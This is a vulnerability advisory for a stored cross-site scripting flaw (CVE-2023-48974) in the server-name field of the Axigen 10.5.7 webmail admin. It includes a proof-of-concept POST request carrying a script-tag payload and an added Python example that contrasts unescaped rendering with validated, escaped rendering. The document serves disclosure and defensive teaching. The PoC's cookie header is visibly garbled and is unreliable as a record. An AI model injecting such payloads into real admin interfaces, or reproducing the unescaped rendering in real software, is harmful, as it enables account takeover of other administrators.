# Exploit Title: Axigen 10.5.7 - Persistent Cross-Site Scripting
# Date: 2023-09-25
# Exploit Author: Vinnie McRae - Redteamer IT Security
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.7) and older versions of Axigen Webmail
# Tested on: Firefox, Chrome
# CVE: CVE-2023-48974
Description
The servername_input parameter is vulnerable to stored cross-site scripting (XSS) because its value is handled without sanitization or filtering. An attacker can inject malicious code into this parameter, and it is then executed whenever another user views the page on which the parameter is used. This affects authenticated administrators, and the attack can be used to target other administrators with higher privileges.
Exploitation
1. Log in as an administrator
2. Navigate to "Global Settings"
3. Change the Server name to <script>alert(1)</script>
PoC of the POST request:
```http
POST /?_h=1BB40E85937506A7186A125BD8C57EF&page=gl_set HTTP/1.1
Host: localhost:9443
Cookie: eula=true;
wmsessionObject=%7b%22ACCOUNTFILTER%22%3A%22%22%2C%22 CurrentDomainName%22%3A%22Axigen%22 Xaxigen%22%2C%22 currentPrincipal%22%22%3A%22NAD a%22%2C%22DOMAINFILTER%22%3A%22%22%2C%22 foldercipientfilter%22%22%3A%22%22%2C%2C%22 groupFilter%22%3A%22%22%22%22helpcontainer%22helpcontainer%22 22%3A% 22Opened%22%2C%22leftmenu%22%3A%5B%22Rights%22%2C%22 services%22C%2C%22C%22C%22C%22C%22 domains%22%2C%2C%22 logging%22%2C%2C%2C%22 logogging%22Logging%2C%2C%22 Backback UP%22%2C%22%22%5D%2C%22mlistFilter%22%22%3A%22%22%2C%2C%22 premiumfilter%22%3A%22%22%22%22%2C%2C%2C%22sslcertificateFilter%22%22%22%3A%3A%22%22%22%22%22%7D;
WebAdminismodified=false; WebAdminIsupDated=true; webadminissaved=true;
public_language=en; _hadmin=6A8ED241FE53D1B28F090146E4C65F52;
Menulefttopposition=-754
Content-Type: multipart/form-data; boundary=---------------------------41639384187581032291088896642
Content-Length: 12401
Connection: close

-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="servername_input"

<script>alert(1)</script>
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="primary_domain_input"

axe
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="ssl_random_file_input"

-snip-
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="update"

Save configuration
-----------------------------41639384187581032291088896642--
```
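The following Python snippet is an added example and is not part of this advisory or of Axigen's code. It models a generic admin settings page that stores a servername_input value and later renders it back to other administrators: the unencoded rendering reproduces the defect class described above, and the hardened version beside it validates the value as a hostname when it is saved and HTML-escapes it when it is rendered. The hostname rule, the table markup and all function names are assumptions chosen for illustration.

```python
"""Stored XSS in a settings form: vulnerable rendering beside the hardened form.

Added example, not Axigen code.  It models a generic admin page that stores a
"servername_input" value and renders it back to other administrators.
"""
import html
import re

# Assumption: a server name in this setting must be an RFC 1123 hostname.
# Each label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name: str) -> bool:
    """Return True only for a syntactically valid hostname (max 253 chars)."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL.match(label) for label in name.rstrip(".").split("."))


def render_vulnerable(settings: dict) -> str:
    # Mirrors the reported defect: the stored value is concatenated into the
    # page with no encoding, so any markup in it becomes part of the document
    # shown to every administrator who opens the settings page.
    return f"<tr><td>Server name</td><td>{settings['servername_input']}</td></tr>"


def save_setting_hardened(settings: dict, servername: str) -> bool:
    """Store the value only if it is what the field is for; report rejection."""
    if not is_valid_hostname(servername):
        return False
    settings["servername_input"] = servername
    return True


def render_hardened(settings: dict) -> str:
    # Output encoding at the point of rendering, regardless of how the value
    # got into the store (validation can be bypassed by other write paths).
    value = html.escape(settings["servername_input"], quote=True)
    return f"<tr><td>Server name</td><td>{value}</td></tr>"


# Constructed sample input: the payload from step 3 of the PoC above.
SAMPLE_PAYLOAD = "<script>alert(1)</script>"


def demo() -> dict:
    """Run both paths against the sample payload and summarise the outcome."""
    # As if written by the unvalidated endpoint.
    store = {"servername_input": SAMPLE_PAYLOAD}
    vulnerable_html = render_vulnerable(store)
    hardened_html = render_hardened(store)

    # The hardened save path refuses the payload and leaves the old value.
    hardened_store = {"servername_input": "mail.example.com"}
    rejected = not save_setting_hardened(hardened_store, SAMPLE_PAYLOAD)

    return {
        "vulnerable_contains_script_tag": "<script>" in vulnerable_html,
        "hardened_contains_script_tag": "<script>" in hardened_html,
        "hardened_rendering": hardened_html,
        "payload_rejected_on_save": rejected,
        "store_unchanged": hardened_store["servername_input"] == "mail.example.com",
    }


if __name__ == "__main__":
    for key, val in demo().items():
        print(f"{key}: {val}")
```

Validation alone does not close the bug: another write path (an API, a configuration import, an older build) could still place markup in the store, so the escape at render time is the control that actually neutralises the stored script, while the hostname check narrows the input surface and gives a clean rejection that can be logged and alerted on.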
#_______________________________________
# Vinnie McRae
# RedTeamer IT Security
# Blog: redteamer.de/blog-beitrag/